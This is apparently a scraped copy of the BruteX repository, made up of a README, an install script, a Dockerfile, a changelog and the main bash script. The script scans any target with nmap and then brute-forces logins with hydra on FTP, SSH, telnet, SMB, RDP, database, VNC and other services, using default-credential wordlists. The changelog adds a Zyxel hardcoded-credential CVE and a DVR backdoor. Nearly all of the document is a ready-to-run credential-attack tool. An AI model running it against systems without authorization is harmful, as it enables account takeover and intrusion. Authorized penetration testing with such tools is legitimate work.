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You may modify and re-distribute this software as long as the project name "BruteX", credit to the author "xer0dayz" and website URL "" are NOT mofified. Doing so will break the license agreement and a takedown notice will be issued.


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You may modify and re-distribute this software as long as the project name "BruteX", credit to the author "xer0dayz" and website URL "" are NOT mofified. Doing so will break the license agreement and a takedown notice will be issued. Build Status Build Status Rawsec's CyberSecurity Inventory


alt tag


Automatically brute force all services running on a target

  • Open ports
  • Usernames
  • Passwords




brutex target <port>


docker build -t brutex .
docker run -it brutex target <port>


You may modify and re-distribute this software as long as the project name "BruteX", credit to the author "xer0dayz" and website URL "" are NOT mofified. Doing so will break the license agreement and a takedown notice will be issued.


=============================== ========================== #!/bin/bash

Install script for BruteX


COLOR1='\033[91m' COLOR2='\033[92m' COLOR3='\033[92m' OKBLUE='\033[94m' RESET='\e[0m'

echo -e "$COLOR1 __________ __ ____ $RESET" echo -e "$COLOR1 ___ _______ __ / | ____ \ / /$RESET" echo -e "$COLOR1 | | /_ __ \ | \ / __ \ \ / $RESET" echo -e "$COLOR1 | | \ | | / | /| | \ / / \ $RESET" echo -e "$COLOR1 | / || |_/ || _ >/\ \ $RESET" echo -e "$COLOR1 / / _/$RESET" echo "" echo -e "$COLOR1 + -- --=[ BruteX by @xer0dayz$RESET" echo -e "$COLOR1 + -- --=[$RESET" echo -e "$RESET"


echo -e "$OKBLUE[]$RESET Installing brutex under $BRUTEX_INSTALL_DIR..." mkdir -p $BRUTEX_INSTALL_DIR 2> /dev/null cp -Rf $PWD/ $BRUTEX_INSTALL_DIR cd $BRUTEX_INSTALL_DIR apt-get update apt-get install -y nmap hydra dnsenum mkdir loot 2> /dev/null chmod +x $BRUTEX_INSTALL_DIR/brutex rm -f /usr/bin/brutex 2> /dev/null ln -s /usr/share/brutex/brutex /usr/bin/brutex cp -f $BRUTEX_INSTALL_DIR/brutex.desktop /usr/share/applications/ 2> /dev/null cp -f $BRUTEX_INSTALL_DIR/brutex.desktop /usr/share/applications/brutex.desktop 2> /dev/null cp -f $BRUTEX_INSTALL_DIR/brutex.desktop /usr/share/kali-menu/applications/brutex.desktop2> /dev/null echo -e "$OKBLUE[*]$RESET Done! $RESET"

FROM ubuntu:16.04 WORKDIR /usr/share/ RUN echo "deb kali-rolling main contrib non-free" >> /etc/apt/sources.list
&& echo "deb-src kali-rolling main contrib non-free" >> /etc/apt/sources.list
&& apt-get update && apt-get install -y --allow-unauthenticated git
&& git clone brutex
&& chmod +x brutex/brutex
&& ln -s /usr/share/brutex/brutex /usr/bin/brutex

WORKDIR brutex ENTRYPOINT ["./brutex"]


  • v2.3 Updated default credentials for Rasberry Pi/Kali
  • v2.2 Added CVE-2020-29583 Zyxel SSH Hardcoded Credentials
  • v2.1 Added Kali XFCE4 start menu application
  • v2.1 Added 0day vulnerability (backdoor) in firmware for HiSilicon-based DVRs, NVRs and IP cameras
  • v2.0 Fixed issue with VNC port
  • v1.9 Updated default credential lists for each service
  • v1.8 Added improved default credential list for each service
  • v1.7 Removed DNS brute forcing
  • v1.7 Added -P0 to NMap scan options
  • v1.6 Removed HTTP/HTTPS basic auth checks to normal scans. Use brutex port <80/443> to scan with that option...
  • v1.5b Fixed issue with dirb
  • v1.5a Removed clear command
  • v1.5 Added
  • v1.5 Fixed SNMP brute force options
  • v1.5 Fixed http/https brute force options
  • v1.4 Removed dirb web directory brute forcing
  • v1.3d Added Fortinet user/pass
  • v1.3d Added DirBuster for web brute forcing
  • v1.3c Fixed error with DNS namelist.txt
  • v1.3b Fixed brutex global DIR issue
  • v1.3a Fixed HTTP proxy brute force options
  • v1.3 added faster scan options for nmap
  • v1.3 revised password brute force lists for more efficient service brute forcing
  • v1.3 added wordlist directory with new wordlist selections
  • v1.2 adds dnsenum / removes DNSDict6 as no longer supported on Kali 2.0
  • v1.2 removed wfuzz web file brute forcing as it was too error prone and noisy
  • v1.2 adds the ability to specify a port to target (ie. 23 for telnet) to automatically brute force
  • v1.2 added additional ports to scan and brute force
  • v1.2 added additional default users to brute force BruteX-logo

======================================================== [Desktop Entry] Name=brutex Encoding=UTF-8 Exec=/usr/share/kali-menu/exec-in-shell "sudo brutex" Icon=avatar-default StartupNotify=false Terminal=true Type=Application Categories=05-password-attacks; X-Kali-Package=brutex Comment= Path=



BruteX by @xer0dayz


BruteX is a simple bash script used to brute force all services on a target.




brutex <IP/hostname>


asterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmpp

TARGET="$1" PORT="$2" VER="2.3" LOOT_DIR=/usr/share/brutex/loot FTP_USER_PASS="/usr/share/brutex/wordlists/ftp-default-userpass.txt" FTP_USERS="/usr/share/brutex/wordlists/ftp_defuser.lst" FTP_PASS="/usr/share/brutex/wordlists/ftp_defpass.lst" SSH_USER_PASS="/usr/share/brutex/wordlists/ssh-default-userpass.txt" SSH_USERS="/usr/share/brutex/wordlists/ssh_defuser.lst" SSH_PASS="/usr/share/brutex/wordlists/ssh_defpass.lst" SMTP_USERS="/usr/share/brutex/wordlists/smtp_defuser.lst" SMTP_PASS="/usr/share/brutex/wordlists/smtp_defpass.lst" POP_USERS="/usr/share/brutex/wordlists/pop_defuser.lst" POP_PASS="/usr/share/brutex/wordlists/pop_defpass.lst" TELNET_USER_PASS="/usr/share/brutex/wordlists/telnet-default-userpass.txt" TELNET_USERS="/usr/share/brutex/wordlists/telnet_defuser.lst" TELNET_PASS="/usr/share/brutex/wordlists/telnet_defpass.lst" SQL_USERS="/usr/share/brutex/wordlists/sql_defuser.lst" SQL_PASS="/usr/share/brutex/wordlists/sql_defpass.lst" MSSQL_USER_PASS="/usr/share/brutex/wordlists/mssql-default-userpass.txt" MYSQL_USER_PASS="/usr/share/brutex/wordlists/mysql-default-userpass.txt" ORACLE_USER_PASS="/usr/share/brutex/wordlists/oracle-default-userpass.txt" POSTGRES_USER_PASS="/usr/share/brutex/wordlists/postgres-default-userpass.txt" WINDOWS_USER_LIST="/usr/share/brutex/wordlists/windows-users.txt" WINDOWS_USER_PASS="/usr/share/brutex/wordlists/windows-default-userpass.txt" USER_FILE="/usr/share/brutex/wordlists/simple-users.txt" PASS_FILE="/usr/share/brutex/wordlists/password.lst" SNMP_FILE="/usr/share/brutex/wordlists/snmp-strings.txt" VNC_FILE="/usr/share/brutex/wordlists/vnc-default-passwords.txt" HTTP_LOCATION="/" THREADS="30" COLOR1='\033[91m' COLOR2='\033[92m' COLOR3='\033[92m' RESET='\e[0m'


#export HYDRA_PROXY=socks4://

if [ -z $TARGET ]; then echo -e "$COLOR1 __________ __ ____ $RESET" echo -e "$COLOR1 ___ _______ __ / | ____ \ / /$RESET" echo -e "$COLOR1 | | /_ __ \ | \ / __ \ \ / $RESET" echo -e "$COLOR1 | | \ | | / | /| | \ / / \ $RESET" echo -e "$COLOR1 | / || |_/ || _ >/\ \ $RESET" echo -e "$COLOR1 / / _/$RESET" echo "" echo -e "$COLOR1 + -- --=[ BruteX v$VER by @xer0dayz$RESET" echo -e "$COLOR1 + -- --=[$RESET" echo -e "$COLOR1 + -- --=[ Usage: brutex " echo -e "$RESET" exit fi

DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )

echo -e "$COLOR1 __________ __ ____ $RESET" echo -e "$COLOR1 ___ _______ __ / | ____ \ / /$RESET" echo -e "$COLOR1 | | /_ __ \ | \ / __ \ \ / $RESET" echo -e "$COLOR1 | | \ | | / | /| | \ / / \ $RESET" echo -e "$COLOR1 | / || |_/ || _ >/\ \ $RESET" echo -e "$COLOR1 / / _/$RESET" echo "" echo -e "$COLOR1 + -- --=[ BruteX v$VER by @xer0dayz$RESET" echo -e "$COLOR1 + -- --=[$RESET" echo "" echo ""

echo -e "$COLOR3################################### Running Port Scan ##############################$RESET" if [ -z "$PORT" ] then nmap -T4 -P0 --open $TARGET -p21,22,23,25,53,80,110,139,162,389,443,445,512,513,514,993,1433,1521,3306,3389,5432,5900,5901,8000,8080,6667 -oX $LOOT_DIR/nmap-$TARGET.xml else nmap -T4 -P0 --open $TARGET -p $PORT -oX $LOOT_DIR/nmap-$TARGET.xml fi echo "" echo -e "$COLOR3################################### Running Brute Force ############################$RESET" echo "" port_21=grep 'portid="21"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_22=grep 'portid="22"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_23=grep 'portid="23"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_25=grep 'portid="25"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_80=grep 'portid="80"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_110=grep 'portid="110"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_139=grep 'portid="139"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_162=grep 'portid="162"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_389=grep 'portid="389"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_443=grep 'portid="443"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_445=grep 'portid="445"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_512=grep 'portid="512"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_513=grep 'portid="513"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_512=grep 'portid="514"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_993=grep 'portid="993"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_1433=grep 'portid="1433"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_1521=grep 'portid="1521"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_3306=grep 'portid="3306"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_3389=grep 'portid="3389"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_5432=grep 'portid="5432"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_5900=grep 'portid="5900"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_5901=grep 'portid="5901"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_6667=grep 'portid="6667"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_8000=grep 'portid="8000"' $LOOT_DIR/nmap-$TARGET.xml | grep open port_8080=grep 'portid="8080"' $LOOT_DIR/nmap-$TARGET.xml | grep open

if [ -z "$port_21" ] then echo -e "$COLOR1 + -- --=[ Port 21 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 21 opened... running tests...$RESET" hydra -C $FTP_USER_PASS $TARGET ftp -t $THREADS -e ns hydra -L $FTP_USERS -P $FTP_PASS $TARGET ftp -t $THREADS -e ns fi

if [ -z "$port_22" ] then echo -e "$COLOR1 + -- --=[ Port 22 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 22 opened... running tests...$RESET" hydra -C $SSH_USER_PASS $TARGET ssh -t $THREADS -e ns hydra -L $USER_FILE -P $PASS_FILE $TARGET ssh -t $THREADS -e ns hydra -L $SSH_USERS -P $SSH_PASS $TARGET ssh -t $THREADS -e ns fi

if [ -z "$port_23" ] then echo -e "$COLOR1 + -- --=[ Port 23 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 23 opened... running tests...$RESET" hydra -C $TELNET_USER_PASS $TARGET telnet -t $THREADS -e ns hydra -L $USER_FILE -P $PASS_FILE $TARGET telnet -t $THREADS -e ns hydra -L $TELNET_USERS -P $TELNET_PASS $TARGET telnet -t $THREADS -e ns fi

if [ -z "$port_25" ] then echo -e "$COLOR1 + -- --=[ Port 25 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 25 opened... running tests...$RESET" hydra -L $USER_FILE -P $PASS_FILE $TARGET smtp-enum -t $THREADS -e ns hydra -L $USER_FILE -P $PASS_FILE $TARGET smtp -t $THREADS -e ns hydra -L $SMTP_USERS -P $SMTP_PASS $TARGET smtp -t $THREADS -e ns fi

if [ -z "$port_80" ] then echo -e "$COLOR1 + -- --=[ Port 80 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 80 opened... running tests...$RESET" hydra -L $USER_FILE -P $PASS_FILE $TARGET http-get -t $THREADS -f -q -e ns -m $HTTP_LOCATION fi

if [ -z "$port_110" ] then echo -e "$COLOR1 + -- --=[ Port 110 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 110 opened... running tests...$RESET" hydra -L $USER_FILE -P $PASS_FILE $TARGET pop3 -t $THREADS -e ns hydra -L $POP_USERS -P $POP_PASS $TARGET pop3 -t $THREADS -e ns fi

if [ -z "$port_139" ] then echo -e "$COLOR1 + -- --=[ Port 139 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 139 opened... running tests...$RESET" hydra -L $WINDOWS_USER_LIST -P $PASS_FILE $TARGET smb -S 139 -t $THREADS -e ns fi

if [ -z "$port_162" ] then echo -e "$COLOR1 + -- --=[ Port 162 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 162 opened... running tests...$RESET" hydra -P $SNMP_FILE snmp -S 162 -t $THREADS -e ns fi

if [ -z "$port_389" ] then echo -e "$COLOR1 + -- --=[ Port 389 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 389 opened... running tests...$RESET" hydra -L $WINDOWS_USER_LIST -P $PASS_FILE $TARGET ldap2 -S 389 -t $THREADS -e ns hydra -L $WINDOWS_USER_LIST -P $PASS_FILE $TARGET ldap3 -S 389 -t $THREADS -e ns fi

if [ -z "$port_443" ] then echo -e "$COLOR1 + -- --=[ Port 443 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 443 opened... running tests...$RESET" hydra -L $USER_FILE -P $PASS_FILE $TARGET https-get -s 443 -t $THREADS -f -q -e ns -m $HTTP_LOCATION fi

if [ -z "$port_445" ] then echo -e "$COLOR1 + -- --=[ Port 445 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 445 opened... running tests...$RESET" hydra -C $WINDOWS_USER_PASS $TARGET smb -S 445 -t $THREADS -e ns hydra -L $WINDOWS_USER_LIST -P $PASS_FILE $TARGET smb -S 445 -t $THREADS -e ns fi

if [ -z "$port_512" ] then echo -e "$COLOR1 + -- --=[ Port 512 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 512 opened... running tests...$RESET" hydra -L $USER_FILE -P $PASS_FILE $TARGET rexec -S 512 -t $THREADS -e ns fi

if [ -z "$port_513" ] then echo -e "$COLOR1 + -- --=[ Port 513 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 513 opened... running tests...$RESET" hydra -L $USER_FILE -P $PASS_FILE $TARGET rlogin -S 513 -t $THREADS -e ns fi

if [ -z "$port_514" ] then echo -e "$COLOR1 + -- --=[ Port 514 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 514 opened... running tests...$RESET" hydra -L $USER_FILE -P $PASS_FILE $TARGET rsh -S 514 -t $THREADS -e ns fi

if [ -z "$port_993" ] then echo -e "$COLOR1 + -- --=[ Port 993 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 993 opened... running tests...$RESET" hydra -L $USER_FILE -P $PASS_FILE $TARGET imap -S 993 -t $THREADS -e ns fi

if [ -z "$port_1433" ] then echo -e "$COLOR1 + -- --=[ Port 1433 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 1433 opened... running tests...$RESET" hydra -C $MSSQL_USER_PASS $TARGET mssql -S 1433 -t $THREADS -e ns hydra -L $WINDOWS_USER_LIST -P $PASS_FILE $TARGET mssql -S 1433 -t $THREADS -e ns fi

if [ -z "$port_1521" ] then echo -e "$COLOR1 + -- --=[ Port 1521 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 1521 opened... running tests...$RESET" hydra -C $ORACLE_USER_PASS $TARGET oracle -S 1521 -t $THREADS -e ns fi

if [ -z "$port_3306" ] then echo -e "$COLOR1 + -- --=[ Port 3306 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 3306 opened... running tests...$RESET" hydra -C $MYSQL_USER_PASS $TARGET mysql -t $THREADS -e ns hydra -L $SQL_USERS -P $SQL_PASS $TARGET mysql -t $THREADS -e ns fi

if [ -z "$port_3389" ] then echo -e "$COLOR1 + -- --=[ Port 3389 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 3389 opened... running tests...$RESET" hydra -C $WINDOWS_USER_PASS $TARGET rdp -t $THREADS -e ns hydra -L $WINDOWS_USER_LIST -P $PASS_FILE $TARGET rdp -t $THREADS -e ns fi

if [ -z "$port_5432" ] then echo -e "$COLOR1 + -- --=[ Port 5432 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 5432 opened... running tests...$RESET" hydra -C $POSTGRES_USER_PASS $TARGET postgres -t $THREADS -e ns fi

if [ -z "$port_5900" ] then echo -e "$COLOR1 + -- --=[ Port 5900 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 5900 opened... running tests...$RESET" hydra -P $VNC_FILE $TARGET vnc -S 5900 -t $THREADS -e ns hydra -P $PASS_FILE $TARGET vnc -S 5900 -t $THREADS -e ns fi

if [ -z "$port_5901" ] then echo -e "$COLOR1 + -- --=[ Port 5901 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 5901 opened... running tests...$RESET" hydra -P $VNC_FILE $TARGET vnc -S 5901 -t $THREADS -e ns hydra -P $PASS_FILE $TARGET vnc -S 5901 -t $THREADS -e ns fi

if [ -z "$port_6667" ] then echo -e "$COLOR1 + -- --=[ Port 6667 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 6667 opened... running tests...$RESET" hydra -L $USER_FILE -P $PASS_FILE $TARGET irc -s 6667 -t $THREADS -e ns fi

if [ -z "$port_8000" ] then echo -e "$COLOR1 + -- --=[ Port 8000 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 8000 opened... running tests...$RESET" hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -s 8000 -f -q -t $THREADS -e ns -m / fi

if [ -z "$port_8080" ] then echo -e "$COLOR1 + -- --=[ Port 8080 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 8080 opened... running tests...$RESET" hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -S 8080 -f -q -t $THREADS -e ns -m / fi

if [ -z "$port_8100" ] then echo -e "$COLOR1 + -- --=[ Port 8100 closed... skipping.$RESET" else echo -e "$COLOR2 + -- --=[ Port 8100 opened... running tests...$RESET" hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -S 8100 -f -q -t $THREADS -e ns -m / fi

echo "" echo -e "$COLOR3################################### Done! ###########################################$RESET" exit 0


You may modify and re-distribute this software as long as the project name "BruteX", credit to the author "xer0dayz" and website URL "" are NOT mofified. Doing so will break the license agreement and a takedown notice will be issued.






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